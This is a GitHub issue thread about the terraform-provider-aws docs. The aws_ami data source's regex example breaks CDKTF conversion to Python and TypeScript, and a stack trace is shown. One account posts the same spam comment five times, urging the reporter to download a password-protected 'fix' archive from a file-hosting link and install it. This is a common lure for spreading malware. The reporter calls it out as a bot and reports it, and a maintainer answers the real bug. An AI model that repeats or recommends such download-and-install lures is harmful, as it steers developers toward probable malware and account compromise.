### ISSUE TITLE
[Docs]: aws_ami datasource has no python or typescript examples

### ISSUE THREAD

**Issue by infowolfe** [hashicorp/terraform-provider-aws#39109]
### Documentation Link

https://registry.terraform.io/providers/hashicorp/aws/latest/docs/data-sources/ami?lang=python

### Description

the aws_ami datasource resource example seems to have a bug in it where it chokes on the regexp used:

```
Adding package @cdktf/provider-aws @ 19.33.0
Internal Error: getExpressionAst errors on input string '"^myami-\d{3}"': main.tf:0,8-10: Invalid escape sequence; The symbol "d" is not a valid escape sequence selector.
Error: getExpressionAst errors on input string '"^myami-\d{3}"': main.tf:0,8-10: Invalid escape sequence; The symbol "d" is not a valid escape sequence selector.
    at cb (/usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl2json/lib/bridge.js:78:34)
    at syscall/js.valueInvoke (/usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl-tools/wasm/wasm_exec.js:366:31)
    at wasm://wasm/018a0d5e:wasm-function[1485]:0x155923
    at wasm://wasm/018a0d5e:wasm-function[1469]:0x153c5b
    at wasm://wasm/018a0d5e:wasm-function[3049]:0x436f63
    at wasm://wasm/018a0d5e:wasm-function[1455]:0x150269
    at wasm://wasm/018a0d5e:wasm-function[174]:0x19d15
    at wasm://wasm/018a0d5e:wasm-function[999]:0xdc249
    at globalThis.Go._resume (/usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl-tools/wasm/wasm_exec.js:538:23)
    at /usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl-tools/wasm/wasm_exec.js:549:8
Collecting Debug Information...
/usr/local/lib/node_modules/cdktf-cli/node_modules/yoga-layout-prebuilt/yoga-layout/build/Release/nbind.js:53
        throw ex;
        ^

Error: getExpressionAst errors on input string '"^myami-\d{3}"': main.tf:0,8-10: Invalid escape sequence; The symbol "d" is not a valid escape sequence selector.
    at cb (/usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl2json/lib/bridge.js:78:34)
    at syscall/js.valueInvoke (/usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl-tools/wasm/wasm_exec.js:366:31)
    at wasm://wasm/018a0d5e:wasm-function[1485]:0x155923
    at wasm://wasm/018a0d5e:wasm-function[1469]:0x153c5b
    at wasm://wasm/018a0d5e:wasm-function[3049]:0x436f63
    at wasm://wasm/018a0d5e:wasm-function[1455]:0x150269
    at wasm://wasm/018a0d5e:wasm-function[174]:0x19d15
    at wasm://wasm/018a0d5e:wasm-function[999]:0xdc249
    at globalThis.Go._resume (/usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl-tools/wasm/wasm_exec.js:538:23)
    at /usr/local/lib/node_modules/cdktf-cli/node_modules/@cdktf/hcl-tools/wasm/wasm_exec.js:549:8 {
  language: 'python',
  __type: 'Internal'
}

Node.js v22.7.0
```

This prevents the documentation from being presented in cdktf languages.

### Would you like to implement a fix?

None

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by infowolfe** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

I think your idiotic bot is malfunctioning. anyway reported, gg, go make another new account.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by stefanfreitag** [comment]
Hi @infowolfe,

thanks for reporting the issue - seems that we need to find a regex  that is working properly for all supported languages. 
Let me have a look.
